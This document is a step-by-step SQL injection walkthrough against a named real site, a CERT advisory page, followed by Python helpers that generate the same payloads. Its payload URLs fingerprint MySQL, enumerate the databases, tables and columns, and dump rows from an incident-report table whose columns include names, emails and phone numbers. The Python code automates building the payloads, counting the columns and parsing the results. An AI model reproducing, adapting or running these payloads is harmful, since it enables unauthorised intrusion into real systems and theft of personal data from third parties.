1. Determine the version: http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 returns the normal page, so the major version is at least 4 (ord('4') is 52) and UNION queries are supported.
2. Guess the number of columns. ORDER BY works for this, or UNION SELECT, adding one column at a time:
http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--
3. Read the database version and the current user: http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
The database version is 5.1.35. It is said that MySQL 4.1 and above support the concat function; I don't know whether that is true, someone more knowledgeable will have to verify it.
4. Check for write privileges
http://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- returns an error, so the current user cannot read mysql.user: it is not a high-privilege account, and there is no write (file) privilege to work with.
No way around it, the tables have to be guessed by hand.
5. List the databases. Previously I used union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
But this injection point would not cooperate with that query, so I picked up a technique from Turkish hackers. Without further ado:
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
(0x5B78786F6F5D is the hex literal for the marker string "[xxoo]"; wrapping the result in it makes the value easy to find in the page without needing quotes in the payload. Note that GROUP_CONCAT output is cut off at group_concat_max_len, 1024 bytes by default, so a long list may be truncated.)
This successfully listed all the databases; foreign hackers really are something else. The databases are:
information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb
6. Dump the tables, here of the twcert database:
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
(0x747763657274 is "twcert" as a hex literal, so the WHERE clause needs no quotes.)
The tables that come back:
downloadfile,irsys,newsdata,secrpt,secrpt_big5
7. Dump the column names, this time of the irsys table:
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
(0x6972737973 is "irsys". Because the filter is on table_name only, a same-named table in another database would be listed as well; adding table_schema=0x747763657274 to the WHERE clause avoids that.)
The columns that come back:
ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
8. Count the rows. At this step hardly any hacker in China bothers to count; they go straight to limit N,1 and increase N until it errors out.
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
It returns 3, so the irsys table holds 3 rows (count(*) counts rows, not fields).
9. Dump the field values
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
dumps the name value of the first row
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
dumps the name value of the second row
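The whole procedure above (find the column count, put a marker-wrapped expression into a reflected column, walk information_schema and then the rows with LIMIT) is mechanical, so here it is as a small set of Python helpers. This is an added example, not code from the original post: it builds the same payload strings the post types by hand and pulls the marker-delimited value back out of a response body. It sends no HTTP traffic; the caller supplies request and response handling (the page_ok callback below is one such hook). The marker "[xxoo]", the hex-literal trick and the -3 filler are the post's; the function names and the sample page body are constructed for illustration.

```python
"""Helpers for MySQL UNION-injection enumeration (added example, see lead-in)."""
import re

MARKER = "[xxoo]"   # the post's 0x5B78786F6F5D delimiter
FILLER = "-3"       # value the post places in every non-reflected column


def hex_literal(s: str) -> str:
    """Encode a string as a MySQL hex literal so the payload needs no quotes
    (this is why the post writes 'twcert' as 0x747763657274)."""
    return "0x" + s.encode("utf-8").hex().upper()


def order_by_probe(n: int) -> str:
    """Step 2, ORDER BY variant: appended to the vulnerable parameter value."""
    return f" order by {n}--"


def union_probe(n_cols: int) -> str:
    """Step 2, UNION variant: numbered placeholders show which positions the page reflects."""
    cols = ",".join(str(i) for i in range(1, n_cols + 1))
    return f" and 2=4 union select {cols}--"


def find_column_count(page_ok, upper: int = 64) -> int:
    """Binary-search the column count with ORDER BY instead of guessing one by one.
    page_ok(n) must return True when '... order by n' still renders the normal page.
    Returns `upper` if the real count is larger, so choose it generously."""
    if not page_ok(1):
        raise ValueError("order by 1 already fails; injection point is not inside a SELECT")
    lo, hi = 1, upper
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if page_ok(mid):
            lo = mid
        else:
            hi = mid - 1
    return lo


def union_extract(expr: str, n_cols: int, reflected: int, from_clause: str = "") -> str:
    """Steps 5-9: wrap `expr` in markers in the reflected column, fill the rest
    with the filler, exactly the shape of the post's payloads."""
    if not 1 <= reflected <= n_cols:
        raise ValueError("reflected column index out of range")
    cols = [FILLER] * n_cols
    cols[reflected - 1] = f"concat({hex_literal(MARKER)},{expr},{hex_literal(MARKER)})"
    tail = f" from {from_clause}" if from_clause else ""
    return f" and 2=4 union select {','.join(cols)}{tail}--"


def schemata_payload(n_cols: int, reflected: int) -> str:
    """Step 5: every database name, comma-joined by GROUP_CONCAT."""
    return union_extract("GROUP_CONCAT(DISTINCT table_schema)", n_cols, reflected,
                         "information_schema.columns")


def tables_payload(n_cols: int, reflected: int, schema: str) -> str:
    """Step 6: table names of one database, schema passed as a hex literal."""
    return union_extract("GROUP_CONCAT(DISTINCT table_name)", n_cols, reflected,
                         f"information_schema.columns where table_schema={hex_literal(schema)}")


def columns_payload(n_cols: int, reflected: int, schema: str, table: str) -> str:
    """Step 7, filtering on table_schema too so a same-named table in another
    database is not mixed in (the post filters on table_name only)."""
    where = f"table_schema={hex_literal(schema)} and table_name={hex_literal(table)}"
    return union_extract("GROUP_CONCAT(DISTINCT column_name)", n_cols, reflected,
                         f"information_schema.columns where {where}")


def count_payload(n_cols: int, reflected: int, schema: str, table: str) -> str:
    """Step 8: count(*) is the number of rows, which bounds the LIMIT walk in step 9."""
    return union_extract("count(*)", n_cols, reflected, f"{schema}.{table}")


def row_payload(n_cols: int, reflected: int, schema: str, table: str,
                column: str, row: int) -> str:
    """Step 9: one column of one row, selected with LIMIT row,1."""
    return union_extract(column, n_cols, reflected, f"{schema}.{table} LIMIT {row},1")


def extract_marked(body: str, marker: str = MARKER) -> list[str]:
    """Return every value found between a pair of markers in a response body."""
    m = re.escape(marker)
    return re.findall(f"{m}(.*?){m}", body, flags=re.S)


def split_group_concat(value: str) -> list[str]:
    """GROUP_CONCAT output is comma-separated; drop empty items."""
    return [v for v in value.split(",") if v]
```

Because GROUP_CONCAT stops at group_concat_max_len (1024 bytes by default), a column list that comes back suspiciously round or cut mid-name should be re-fetched in pieces, for example with a LIMIT on a plain SELECT column_name query, rather than trusted as complete.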